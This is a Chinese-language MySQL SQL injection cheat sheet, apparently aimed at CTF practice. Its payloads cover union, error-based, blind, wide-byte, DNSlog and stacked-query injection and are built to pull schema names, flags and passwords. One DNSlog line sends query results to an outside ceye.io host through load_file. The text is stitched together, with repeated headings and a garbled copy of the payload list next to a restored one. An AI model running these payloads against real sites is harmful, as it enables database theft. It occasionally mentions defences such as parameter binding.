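-- Database-level DDL basics (MySQL). The original used `//` for remarks, which MySQL does
-- not treat as a comment; use `-- ` (with the trailing space) or `#` instead.
CREATE DATABASE test;                                        -- create a database named test
DROP DATABASE test;                                          -- delete it (irreversible; in scripts prefer DROP DATABASE IF EXISTS)
-- Create the admin table. `user` is a reserved word in several engines, hence the backticks.
-- `pass` must hold a salted password hash (bcrypt/argon2), never the plaintext password.
CREATE TABLE `admin` (`user` VARCHAR(255) NULL, `pass` VARCHAR(255) NULL);
-- The ALTERs below assume a table named test already exists (it is not created above).
ALTER TABLE test DROP id;                                    -- drop column id from table test
ALTER TABLE test ADD COLUMN id INT DEFAULT 0 FIRST;          -- add column id as the first column of test
ALTER TABLE test MODIFY id INT AUTO_INCREMENT PRIMARY KEY;   -- make id an auto-increment primary key
ALTER TABLE test RENAME TO date;                             -- rename table test to date (the original remark said "data"; the statement itself uses `date`)
SHOW DATABASES;                                              -- list all databases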
数据层面的增删改查
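-- Row-level CRUD on a table student (assumed to exist with columns name, sex, year).
-- In application code these values must be bound as parameters; string-building the statement
-- from user input is exactly what the injection payloads further down exploit.
INSERT INTO student (name, sex, year) VALUES ("张三", "男", "1990/6/15");  -- original had ';' between the last two values (syntax error)
DELETE FROM student WHERE name = '张三';
UPDATE student SET sex = '女' WHERE name = '张三';
SELECT * FROM student;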
id=-1 union select 1,(select schema_name from information_schema.schemata limit 0,1),3
id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3 //limit 0,1 把子查询限制为一行:库中有多张表时去掉 limit 会因标量子查询返回多行而报错(Subquery returns more than 1 row);只有一张表时带不带 limit 都不会报错(原注释说反了)。改成 limit 1,1、limit 2,1 可逐个取出其余表。另外 union 两侧的列数必须与原查询一致(先用 order by n 或 union select null,null,... 探出列数):这里按 3 列写,下面 group_concat 的例子按 4 列写,要按目标调整
id=-1 union select 1,(select column_name from information_schema.columns where table_name='flag' limit 0,1),3 //建议加上 and table_schema=database():只按 table_name 过滤时,其他库中同名表的列也会混进来
id=-1 union select 1,(select flag from flag limit 0,1),3
id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4
id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4
id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3,4
id=-1 union select 1,(select group_concat(flag) from flag),3,4
报错注入
基于updatexml
'and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)--+
'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= database()),0x7e),1)--+
'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema= database() and table_name='users'),0x7e),1)--+
'and updatexml(1,concat(0x7e,(select group_concat(flag) from flag.flag),0x7e),1)--+
'and updatexml(1,concat(0x7e,substring((select group_concat(flag) from flag.flag),32),0x7e),1)--+ //updatexml/extractvalue 的报错信息只回显 32 个字符,其中第 1 个是 0x7e(~),所以每次实际只能看到 31 个字符的数据;用 substring(*,n) 分段读取时起始位置每次前移 31,即 1、32、63、94…(原文写的 95 会跳过第 94 个字符);也可以写成 substring(*,n,31) 明确每次取 31 个字符
基于extractvalue
'and extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e))--+
'and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= database()),0x7e))--+
'and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema= database() and table_name='users'),0x7e))--+
'and extractvalue(1,concat(0x7e,(select group_concat(flag) from flag.flag),0x7e))--+
'and extractvalue(1,concat(0x7e,substring((select group_concat(flag) from flag.flag),32),0x7e))--+ //extractvalue 的分段读取写法(原文此处误贴了上面的 updatexml 版本);同样每次只回显 32 个字符、首位是 ~,起始位置按 1、32、63、94… 递增
以下内容来源于互联网,大多数函数的利用都有版本条件或其他条件限制 1.floor() floor 和group by 搭配使用 利用group by 的key唯一性 和mysql 编码执行顺序导致二次执行产生不同key select from users where id=1 OR+1e0GROUP BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)2)) HAVING+MIN(0)OR+1 数值型注入时 不用闭合‘ 进行注入 利用 or 条件注入 通用型 的一般格式 注入 select from users where id=1 and (select 1 from (select count(),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) 2.extractvalue 对XML文档进行查询的函数 和updatexml() 一样 针对5.5版本以后 select * from users where id=1 and extractvalue(1,concat(0x7e,user())) 3.updatexml() select * from test where id=1 and updatexml(1,concat(0x7e,user()),1) 4.geometrycollection() select from test where id=1 and geometrycollection((select from(select * from(select user())a)b)); 5.multipoint() select from test where id=1 and multipoint((select from(select * from(select user())a)b)); 6.polygon() select from test where id=1 and polygon((select from(select * from(select user())a)b)); 7.multipolygon() select from test where id=1 and multipolygon((select from(select * from(select user())a)b)); 8.linestring() select from test where id=1 and multilinestring((select from(select * from(select user())a)b)); 9.multilinestring() select from test where id=1 and multilinestring((select from(select * from(select user())a)b)); 10.exp() exp()即为以e为底的对数函数 exp(709) 里面的参数在大于709时函数会报错 ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)' select from test where id=1 and exp(~(select from(select user())a)); 11.procedure analyse select * from users order by 1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1) 12.用户变量 select min(@a:=1) from information_schema.tables group by concat(database() ,@a:=(@a+1)%2) 13.通过NAME_CONST(适用于低版本) +or+(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x) 14.0位取反报错 (BIGINT溢出) select ~0+!(select*from(select user())x); 15.atan,ceil,floor,!,...相减溢出 select !atan((select*from(select user())a))-~0; select !ceil((select*from(select user())a))-~0; select 
!floor((select*from(select user())a))-~0; select !HEX((select*from(select user())a))-~0; select !RAND((select*from(select user())a))-~0; select !FLOOR((select*from(select user())a))-~0; select !CEILING((select*from(select user())a))-~0; select !RAND((select*from(select user())a))-~0; select !TAN((select*from(select user())a))-~0; select !SQRT((select*from(select user())a))-~0; select !ROUND((select*from(select user())a))-~0; select !SIGN((select*from(select user())a))-~0; 16.@:= !(selectfrom(select(concat(@:=0,(select count()frominformation_schema.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0 (select(!x-~0)from(select(concat (@:=0,(select count(*)frominformation_schema.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a) (select!x-~0.from(select(concat (@:=0,(select count(*)frominformation_schema.columns where table_schema=database()and@:=concat (@,0xa,table_name,0x3a3a,column_name)),@))x)a) 17.^ 按位异或 select !(select*from(select user())a)-0^222; 18.0位表减溢出 (select(!x-~0)from(select(select user())x)a) (select!x-~0.from(select(select user())x)a) 19.in溢出 select from users where id in(~0+!(selectfrom(select user())x))
1'and length(database())=1#
1'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>1#
1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1))>1#
时间盲注
在基于布尔盲注的基础上加了if sleep判断
'and if(length(database())=5,sleep(3),1)--+
'and if(ascii(substr((select password from users limit 0,1),1,1))>100,sleep(3),1)--+
'and if(ascii(substr((select group_concat(password) from users),1,1))>100,sleep(3),1)--+
id=-1%df' union select 1,database(),3,4--+
id=-1%df' union select 1,(select table_name from information_schema.tables where table_schema=(select database())limit 0,1),3,4--+
id=-1%df' union select 1,(select column_name from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database())limit 0,1) limit 0,1),3,4--+
id=-1%df' union select 1,(select flag from flag.flag limit 0,1),3,4--+
and (select load_file(concat('//',(select database()),'.4xxx5.ceye.io/sqli'))) //把 4xxx5.ceye.io 换成自己的 dnslog 域名;前提是 secure_file_priv 为空(不限制文件操作),并且一般只对运行在 Windows 上的 MySQL 有效(只有 Windows 会把 //host/share 当作 UNC 路径去做 DNS 解析)
and (select load_file(concat('//',(select group_concat(flag) from flag.flag),'.4xxx.ceye.io/sqli')))
mysql基础
数据库层面的增删改查
数据层面的增删改查
mysql内置函数
mysql注释符
联合注入
使用limit单个查询
往后所有的注入,都可以在limit与group_concat中灵活切换
使用group_concat()分组查询
报错注入
基于updatexml
基于extractvalue
以下内容来源于互联网,大多数函数的利用都有版本条件或其他条件限制
1.floor()
floor 和group by 搭配使用 利用group by 的key唯一性 和mysql 编码执行顺序导致二次执行产生不同key
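-- floor()/rand()/group by: the grouping key is evaluated twice, so the same row can hash to
-- different keys and MySQL raises "Duplicate entry '<key>' for key" with VERSION() in it.
-- The original line lost its '*' characters in extraction and used '+' for URL-encoded spaces;
-- restored to plain SQL (RAND(0)*2 as in the generic form below; 1e0 is presumably just the literal 1).
select * from users where id=1 OR 1e0 GROUP BY CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2)) HAVING MIN(0) OR 1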
数值型注入时 不用闭合‘ 进行注入 利用 or 条件注入
通用型 的一般格式 注入
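-- Generic floor() error-based form: count(*) grouped by concat(user(), floor(rand(0)*2)) yields
-- a duplicate group key, and the duplicate-entry error echoes user().
-- '*' in `select *` and `count(*)` was lost in extraction; restored.
select * from users where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)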
2.extractvalue
对XML文档进行查询的函数 和updatexml() 一样 针对5.5版本以后
-- extractvalue(xml, xpath): 0x7e ('~') makes the XPath invalid, so MySQL raises an
-- "XPATH syntax error" whose message includes the rest of the string, i.e. user().
SELECT * FROM users WHERE id = 1 AND extractvalue(1, concat(0x7e, user()))
3.updatexml()
-- updatexml(xml, xpath, new_xml): same idea as extractvalue(); the invalid XPath in arg 2
-- produces an XPATH syntax error that carries user() in its text.
SELECT * FROM test WHERE id = 1 AND updatexml(1, concat(0x7e, user()), 1)
4.geometrycollection()
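-- GIS constructor fed a non-geometry derived table: the "Illegal non geometric" error echoes the
-- subquery. Version-gated (see the note at the top of this list). '*' restored after extraction loss.
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));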
5.multipoint()
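-- multipoint() variant of the GIS-constructor error; '*' restored after extraction loss.
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));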
6.polygon()
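-- polygon() variant of the GIS-constructor error; '*' restored after extraction loss.
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));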
7.multipolygon()
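-- multipolygon() variant of the GIS-constructor error; '*' restored after extraction loss.
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));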
8.linestring()
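-- linestring() variant (the heading names linestring(); the original line was a copy of the
-- multilinestring() payload below). '*' restored after extraction loss.
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));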
9.multilinestring()
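-- multilinestring() variant of the GIS-constructor error; '*' restored after extraction loss.
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));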
10.exp()
exp()即为以e为底的对数函数
exp(709) 里面的参数在大于709时函数会报错
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'
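-- `~` of the subquery result is a huge unsigned value, so exp() overflows DOUBLE (error 1690 above)
-- and the out-of-range message quotes the expression with the subquery value inside it.
-- '*' restored after extraction loss.
select * from test where id=1 and exp(~(select * from(select user())a));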
11.procedure analyse
-- The extractvalue() passed as PROCEDURE ANALYSE()'s argument raises the XPath error carrying
-- version(). Only usable on MySQL < 8.0: PROCEDURE ANALYSE was removed in 8.0.
SELECT * FROM users ORDER BY 1 PROCEDURE ANALYSE(extractvalue(rand(), concat(0x3a, version())), 1)
12.用户变量
-- User-variable flip inside GROUP BY: @a alternates between evaluations of the key, so the
-- same duplicate-key mechanism as the floor() trick fires and the error shows database().
SELECT MIN(@a := 1) FROM information_schema.tables GROUP BY CONCAT(database(), @a := (@a + 1) % 2)
13.通过NAME_CONST(适用于低版本)
-- URL-encoded fragment ('+' = space), left as written. NAME_CONST(version(),1) names the column
-- after version(); two identical columns in the derived table give a "Duplicate column name"
-- error that carries that name. Heading says older MySQL versions only.
+or+(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)
14.0位取反报错 (BIGINT溢出)
-- ~0 is the largest BIGINT UNSIGNED; `!` of the (non-numeric) subquery value is 1, and adding it
-- overflows, so the out-of-range error message carries the subquery text (user()).
SELECT ~0 + !(SELECT * FROM (SELECT user()) x);
15.atan,ceil,floor,!,...相减溢出
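-- Subtraction overflow: `!` turns the function result into 0/1, and subtracting ~0
-- (BIGINT UNSIGNED max) underflows, so the out-of-range error echoes the subquery.
-- The original list repeated floor/FLOOR and RAND twice; duplicates removed, order kept.
select !atan((select*from(select user())a))-~0;
select !ceil((select*from(select user())a))-~0;
select !floor((select*from(select user())a))-~0;
select !HEX((select*from(select user())a))-~0;
select !RAND((select*from(select user())a))-~0;
select !CEILING((select*from(select user())a))-~0;
select !TAN((select*from(select user())a))-~0;
select !SQRT((select*from(select user())a))-~0;
select !ROUND((select*from(select user())a))-~0;
select !SIGN((select*from(select user())a))-~0;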
16.@:=
!(select*from(select(concat(@:=0,(select count(*)from information_schema.columns where table_schema=database() and @:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)-~0
(select(!x-~0)from(select(concat(@:=0,(select count(*)from information_schema.columns where table_schema=database() and @:=concat(@,0xa,table_name,0x3a3a,column_name)),@))x)a)
(select!x-~0.from(select(concat(@:=0,(select count(*)from information_schema.columns where table_schema=database() and @:=concat(@,0xa,table_name,0x3a3a,column_name)),@))x)a)
(以上三条在提取时丢失了 `*` 并被拼成了一行,这里按原意恢复:where 子句里的 @:=concat(...) 在 count(*) 扫过的每一行上把 表名::列名 累加进 @,再用 !x-~0 的无符号减法溢出报错把累加结果带出来)
17.^ 按位异或
-- Bitwise-XOR variant from the source list; `0^222` binds tighter than `-`, so it is evaluated first.
-- The source does not explain what triggers the error here; kept for completeness.
SELECT !(SELECT * FROM (SELECT user()) a) - 0 ^ 222;
18.0位表减溢出
-- Same subtraction-overflow trick as item 15, with the subquery aliased as x first.
-- In the second form `~0.` (note the dot) is presumably `~` applied to the decimal literal `0.`;
-- the token is kept exactly as written.
(select(!x-~0)from(select(select user())x)a)
(select!x-~0.from(select(select user())x)a)
19.in溢出
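-- Same ~0 + !(...) BIGINT overflow as item 14, placed inside an IN list.
-- '*' restored after extraction loss.
select * from users where id in(~0+!(select*from(select user())x))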
布尔盲注
相比较于联合注入,只不过多了一个截取字符串取ASCII值作比较的过程,原理还是一样的,这里只给出一个demo
时间盲注
在基于布尔盲注的基础上加了if sleep判断
宽字节注入
由于我们输入的单引号被转义,所以id无法逃逸。一般情况下此处无法注入,但有一个特例:在数据库连接使用GBK编码时,可以利用宽字节注入。宽字节的格式是在地址栏参数后先加一个%df,再加单引号:转义加上的反斜杠编码为%5c,在GBK编码中%df%5c会被当成一个双字节汉字(原文称为繁体“连”),反斜杠被“吃掉”,单引号就成功逃逸了。根本原因是转义函数按单字节处理而连接字符集是多字节;防御上应使用预处理语句(参数绑定),并用 mysqli_set_charset()/SET NAMES 保证转义与连接字符集一致,而不是 addslashes 之类不感知字符集的转义。
其流程和联合注入一样,但是这里不能使用引号,所以要套娃
DNSlog注入
执行SQL语句,只不过把执行了SQL语句之后返回的结果通过另一种形式反馈给了我们——dnslog
前提:secure_file_priv 必须为空字符串(不限制文件读写);它为 NULL 时 load_file() 等文件操作被整体禁用,为某个目录时只允许读写该目录下的文件(用 show variables like 'secure_file_priv' 查看)。另外,靠 //host/path 这种 UNC 路径触发 DNS 解析的方式一般只对运行在 Windows 上的 MySQL 有效。
堆叠注入
前提:允许一次执行多条语句,如 PHP 的 mysqli_multi_query();PDO 的 MySQL 驱动默认也接受多条语句(可通过 PDO::MYSQL_ATTR_MULTI_STATEMENTS=false 关闭)。
原理:可以执行多条语句,多语句间用分号隔开
杂七杂八的注入